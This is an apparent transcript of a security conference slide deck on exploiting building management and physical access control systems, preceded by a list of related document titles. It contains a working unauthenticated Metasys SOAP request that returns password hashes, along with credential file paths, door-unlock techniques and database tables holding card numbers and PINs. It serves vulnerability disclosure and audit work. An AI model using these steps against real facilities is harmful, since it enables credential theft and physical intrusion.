Exploiting Access Control and Facility Management Systems. Billy Rios Director of Threat Intelligence Qualys



Similar documents
Secret Server Qualys Integration Guide

Who is Watching You? Video Conferencing Security

Overview. Alarm console supports simultaneous viewing of both live and recorded video when alarm events are selected

Penetration Testing Corporate Collaboration Portals. Giorgio Fedon, Co-Founder at Minded Security

Today s Topics. Protect - Detect - Respond A Security-First Strategy. HCCA Compliance Institute April 27, Concepts.

We don t need no stinkin badges!

PROTECT, CONTROL, and MONITOR the security of your facility in real-time.

P2000 SECURITY management SYSTEM. More control means more freedom

Web Plus Security Features and Recommendations

Information. Questions will be answered at the end. Please submit questions to Erick Mendoza using the chat function.

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

SysPatrol - Server Security Monitor

Penetration Testing Report Client: Business Solutions June 15 th 2015

Access Professional Edition Selection Guide

PRT-CTRL-SE. Protege System Controller Reference Manual

P2000 Security Management System MAKING THE CASE FOR SITUATIONAL AWARENESS

INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

SAST, DAST and Vulnerability Assessments, = 4

The SCADA That Didn t Cry Wolf: Who s Really Attacking Your SCADA Devices

Exploiting controls systems demonstration using Shodan, DB Exploit, Google Hacking, Diggity, Kali Linux

How to Grow and Transform your Security Program into the Cloud

Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0

GMS GRAPHICAL MANAGEMENT SYSTEM

Alice. Software as a Service(SaaS) Delivery Platform. innovation is simplicity

How To Manage Security On A Networked Computer System

How To Manage Web Content Management System (Wcm)

About This Document 3. Integration and Automation Capabilities 4. Command-Line Interface (CLI) 8. API RPC Protocol 9.

Doors.NET Access Control Software. Data Sheet. web:

STABLE & SECURE BANK lab writeup. Page 1 of 21

Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat.

Eyes on IZON: Surveilling IP Camera Security

A POLYCOM WHITEPAPER Polycom. Recommended Best Security Practices for Unified Communications

Real World Web Service Testing For Web Hackers

Thick Client Application Security

Georgia Institute of Technology Data Protection Safeguards Version: 2.0

Security Features: Lettings & Property Management Software

Dooblo SurveyToGo: Security Overview

AUTHORED BY: George W. Gray CTO, VP Software & Information Systems Ivenix, Inc. ADDRESSING CYBERSECURITY IN INFUSION DEVICES

Cisco Physical Access Manager

Access Control Management Software

Seven Strategies to Defend ICSs

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Honeywell Industrial Cyber Security Overview and Managed Industrial Cyber Security Services Honeywell Process Solutions (HPS) June 4, 2014

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

SECURITY TRENDS & VULNERABILITIES REVIEW 2015

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

The Nexpose Expert System

Locking down a Hitachi ID Suite server

Niagara IT Manager s Guide

Threat Modelling for Web Application Deployment. Ivan Ristic (Thinking Stone)

How To Use Saml 2.0 Single Sign On With Qualysguard

System Administration Training Guide. S100 Installation and Site Management

13 Ways Through A Firewall

Surveillance and Security for Casinos. Cost-Effective Solutions for Any Size Facility

Employee Active Directory Self-Service Quick Setup Guide

Polycom Recommended Best Security Practices for Unified Communications

Control System - Enterprise Integration HVAC Concepts, Inc. (2005)

GFI White Paper PCI-DSS compliance and GFI Software products

Vulnerability Assessment and Penetration Testing

How I Learned to Stop Worrying and Love Compliance Ron Gula, CEO Tenable Network Security

MANAGED FILE TRANSFER: 10 STEPS TO SOX COMPLIANCE

P2000 AND P2000LE SECURITY MANAGEMENT SYSTEM. Interactive, real time security management

OWASP OWASP. The OWASP Foundation Selected vulnerabilities in web management consoles of network devices

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

SSL and Browsers: The Pillars of Broken Security

modules 1 & 2. Section: Information Security Effective: December 2005 Standard: Server Security Standard Revised: Policy Ref:

EXPLOITING SURVEILLANCE CAMERAS

Manipulating Microsoft SQL Server Using SQL Injection

Freight Tracking Web Service Implementation Guide

Analyze. Secure. Defend. Do you hold ECSA credential?

Security Awareness For Server Administrators. State of Illinois Central Management Services Security and Compliance Solutions

The Access Engine. Building Integration System - The Access Engine. Security Systems

Mobility Services Platform Software Installation Guide

SonicWALL PCI 1.1 Implementation Guide

WIN-PAK Integrated Security POWERFUL SECURITY INTEGRATION. Integrated Access Control, Video and Intrusion Platform

Serenity s Web & Mobile Remote Access Concept

My FreeScan Vulnerabilities Report

FX Supervisory Controller Upgrade and Migration Instructions Technical Bulletin

IT HEALTHCHECK TOP TIPS WHITEPAPER

CS 356 Lecture 25 and 26 Operating System Security. Spring 2013

Building Integration System Your platform for customized security and safety management

Tailored integration to suit you

Adobe Systems Incorporated

Capital District Vulnerability Assessment

Why Should You Care About Security Issues? SySmox WEB security Top seven ColdFusion Security Issues

SAFEGUARDING YOUR HOMEOWNERS ASSOCIATION AND COMMON AREAS

Microsoft STRIDE (six) threat categories

Overview of Microsoft Enterprise Mobility Suite (EMS) Cloud University

mbits Network Operations Centrec

Fundamentals of Network Security - Theory and Practice-

4. Getting started: Performing an audit

2012 Data Breach Investigations Report

Achieving PCI COMPLIANCE with the 2020 Audit & Control Suite.

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Transcription:

Exploiting Access Control and Facility Management Systems Billy Rios Director of Threat Intelligence Qualys

About:Me Qualys Director of Vulnerability Research and Threat Intelligence SpearPoint Security (Acquired by Cylance) Founder/CEO Google (Previously) TL for the Google Security Team (WOOPS) Security Release Engineer - Google Plus

About:Me Security PM Microsoft (Previously) Security PM for Internet Explorer Security Release Engineer Online Services Education 2006 MBA 2004 MSIS 2000 BA Business

About:Me Publications: Hacking the Next Generation O Reilly Inside Cyber Warfare O Reilly The Virtual Battlefield IOS Press ICS Vulnerability Research: Over 30 publically credited in ICS-CERT advisories Vendor Assistance Over 1000 individual issues reported to DHS

http://ics-cert.us-cert.gov/sites/default/files/ics-cert_monitor_jan-mar2013.pdf

Intelligent Building Interaction between security systems and other building systems Unified user experience Card Access Video Intrusion HVAC Lighting

Facility Management Systems Card Access Tenant Billing Video Energy Intrusion Elevator HVAC Lighting System Interaction: Unoccupied building, Saturday night

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Video Energy Intrusion Elevator HVAC Lighting System Interaction: Scott swipes card at main entrance, works on 4 th floor South

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Camera Preset 1, Initiate Recording HTTP Video Energy Intrusion Elevator HVAC Lighting System Interaction: Video system needs to verify and record Scott s entrance

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Camera Preset 1, Initiate Recording HTTP Video Energy Disarm Intrusion Zone 4 LEGACY Intrusion Elevator HVAC Lighting System Interaction: Alarm system armed, need to disarm 4 th floor intrusion zone

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Camera Preset 1, Initiate Recording HTTP Video Energy Disarm Intrusion Zone 4 LEGACY System Interaction: Intrusion Elevator HVAC Lighting Floor 3 Enable XML Allow access to 4 th floor

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Camera Preset 1, Initiate Recording HTTP Video Energy Disarm Intrusion Zone 4 LEGACY System Interaction: Intrusion Elevator HVAC Lighting Floor 3 Enable Zone 4 Occupied XML It is hot in Scott s office, turn on AC

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Camera Preset 1, Initiate Recording HTTP Video Energy Disarm Intrusion Zone 4 LEGACY System Interaction: Intrusion Elevator HVAC Lighting Floor 3 Enable Zone 4 Occupied XML Scott needs light on 4 th floor hallway and office Circuit 1, 2 ON MODBUS

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Camera Preset 1, Initiate Recording HTTP Video Energy Totalize light and HVAC for Zone 4 Disarm Intrusion Zone 4 LEGACY System Interaction: Intrusion Elevator HVAC Lighting Floor 3 Enable Zone 4 Occupied XML Lights and AC for Scott used 50 kwh Circuit 1, 2 ON MODBUS

Facility Management Systems Access Granted, Zone 4 Card Access Tenant Billing Generate / email Invoice for Sat SMTP Camera Preset 1, Initiate Recording HTTP Video Energy Totalize light and HVAC for Zone 4 Disarm Intrusion Zone 4 LEGACY System Interaction: Intrusion Elevator HVAC Lighting Floor 3 Enable Zone 4 Occupied XML Invoice Scott for $150 of after hours energy usage Circuit 1, 2 ON MODBUS

Device Password Retrieval Vulns Niagara Framework Unauthenticated user can retrieve the device passwords Password is encoded, we ve written a routine to decode the encoded password Clear text password can be used to gain administrative access to the device Administrative access can be used to gain ROOT or SYSTEM on the underlying device MetaSys Unauthenticated user can retrieve the device password hashes (SHA1) Unauthenticated Password Reset for any user Authentication Bypass Compromise of the underlying system at SYSTEM

Tridium Niagara Framework

Johnson Controls - MetaSys

Physical Security is Important Physical access typically allows: Compromise through console access Use of technician/service credentials to access maintenance menus Access to the Building Automation and Control Network (BACnet)

Device Password Retrieval Vulns Niagara Framework Issues fixed and addressed by the latest security patches MetaSys No response from the vendor Reported 11/22/2013 to DHS via ICS-CERT

A Deeper Look into MetaSys The device we have runs on WinCE IDA Pro tells us portable executables are for x86 Some of files are.net assemblies!

Metasys Filesystem Flash:/Metasys contains all the audit logs and configuration files Flash:/Metasys/SecureDB/SecurityDB.xml contains users and password hashes MetasysSysAgent account is a the Metasys System Agent and has the USERID of 1

Captain Obvious WinCE typically has unauthenticated telnet open, which drops you to a shell WinCE also typically has unauthenticated FTP open, which gives you access to system files

Metasys File system Flash:/Storage contains crashdumps and associated memdumps Flash:/Storage/Metasys/Preferences stores user and system preferences Flash/Storage/Metasys/SecureDB has another copy of the SecurityDB.xml file, as well as the Metasys database (SDF file)

Metasys File system Flash:/Storage/Metasys/wwwroot/MetasysXXX contains application logic for the web interface Webroot contains ~50 different jar files, may of which get deployed to the client Flash:/Storage/Metasys/wwwroot/metasysXXX/WS contains webservice code

Metasys Web Services All application logic is contained within precompiled binaries in the flash:/storage/metasys/wwwroot/metasysxxx/ws/bin directory Most of the binaries are.net assemblies! Reversing these binaries revealed some interesting bugs

Metasys Web Services Digging through the.net assemblies, we see web services to: Retrieve directory listing from the device Upload arbitrary file to arbitrary locations Retrieve a users password hash

Metasys Web Services Digging through the.net assemblies, we see web services to: Retrieve directory listing from the device Upload arbitrary file to arbitrary locations Retrieve a users password hash because remotely retrieving a users password hash is a really popular feature!

WebService.Common.dll

WebService.Common.dll

Subsystems.Common.dll

Subsystems.Common.dll PrincipalStore()

PrincipalStore getuserproperty()

POST POST /MetasysIII/WS/Security/AdminService.asmx HTTP/1.1 <?xml version="1.0" encoding="utf-8"?> <soap12:envelope xmlns:xsi="http://www.w3.org/2001/xmlschema-instance" xmlns:xsd="http://www.w3.org/2001/xmlschema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:body> <GetUserProperty xmlns="http://johnsoncontrols.com/metasysiii/webservices/security/"> <userid>1</userid> </GetUserProperty> </soap12:body> </soap12:envelope>

Response HTTP/1.1 200 OK <?xml version="1.0" encoding="utf-8"?><soap:envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:xsi="http://www.w3.org/2001/xmlschema-instance" xmlns:xsd="http://www.w3.org/2001/xmlschema"><soap:body><getuserpropertyresponse xmlns="http://johnsoncontrols.com/metasysiii/webservices/security/"><getuserpropertyresult><stuff><metasysuser id="1"><username>metasyssysagent</username><password>passwordhash</password><fullna me>metasys System Agent</fullName><emailAddress /><description>metasys System Administrator</description><singleAccessUser>false</singleAccessUser><temporaryUser>false</temporaryUser><userE xpiresdate>2099-02- 01</userExpiresDate><passwordExpiresDate>ExpirationDate</passwordExpiresDate><mustChangePassword>false</mu stchangepassword><cannotchangepassword>false</cannotchangepassword><accountdisabled>false</accountdisable d><accountlockedout>false</accountlockedout><modifyownprofile>true</modifyownprofile><canviewnavtree>true </canviewnavtree><userdefined>false</userdefined><roles><role id="4" /><Role id="1" /></Roles></MetasysUser></Stuff></GetUserPropertyResult></GetUserPropertyResponse></soap:Body></soap:Envelope >

Epic Fail

Epic Fail Web Services are available to UNAUTHENTICATED USERS!

Metasys Exploit Demo

Our Enumeration Effort Initially based on Shodan, moved to custom scanners in Amazon EC2 We ve identified over 50,000 buildings exposed to the Internet Stadiums, hospitals, police stations, prisons, military installations etc Total cost of about $500 to get equipment and EC2 time

These systems are surprisingly prevalent on the Internet Check it out!

Internet Facing Facility Management Systems Demo

Access Control Systems

Access Control Simplified

Access Control Simplified Serial or IP

Access Control Simplified SQL

Access Control Simplified SQL

Access Control Simplified Serial or IP

Access Control Simplified 5/12 Volts

Access control attack points - Reader Physical Access trumps everything Typically 5/12 volts to the correct wire or a serial replay will trigger a door unlock Requires physical access Usually requires disassembly of a device from a wall (be careful of tamper alarms)

Access control attack points - Software Typically installed on Windows boxes Popular access control software includes: CCURE HANDnet DOOR.NET

Finding Access Control Software Registry key - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall CCURE Displayname - CCURE System Uninstall Key {2DD780A0-E179-11D4-80DC-00C04F02D1A9} DOOR.NET Displayname Doors_vX.XX Uninstall Key {7FFA81CC-F551-11D7-B44A-00A0CC3FC224} HandNet Displayname HandNet for Windows Uninstall Key - {EDEEAA62-EE2C-11D4-8C79-000103813D31}

Access to the applications allows for by design unlocking of doors Select the device you wish to unlock and press unlock Add a rogue user to a user group that has access

Access to the applications allows for by design unlocking of doors Select the device you wish to unlock and press unlock Add a rogue user to a user group that has access

Access control attack points - Database CCURE Sysprogress is the DB administrator account Database name is usually CCURE_SQL KERI DOORS Install location:\doors_vx.xx\db\badge (Doors for Windows) Database name is usually DHS_MAIN via Windows Auth (Doors.NET)

The database structure can be a little complicated (CCURE is shown here)

Access to the applications allows for by design unlocking of doors Looking at the t_card, t_ccure_journal, and t_person are some of the more interesting tables t_person has all the card numbers and pins

Access Control Demo

I want to audit our organization, where do I start?

Facilities Management Ask your facilities department about: Tridium - Niagara Johnson Controls MetaSys Automated Logic WebCTRL Delta Controls - eneliweb

Access Controls Ask your physical security folks about: CCURE CCURE Keri Door.NET Schlage - HandNET

Surveillance Systems Ask your physical security folks about: PELCO IP and CC systems American Dynamics DVR, VideoEdge

The folks who run your Datacenters have access to everything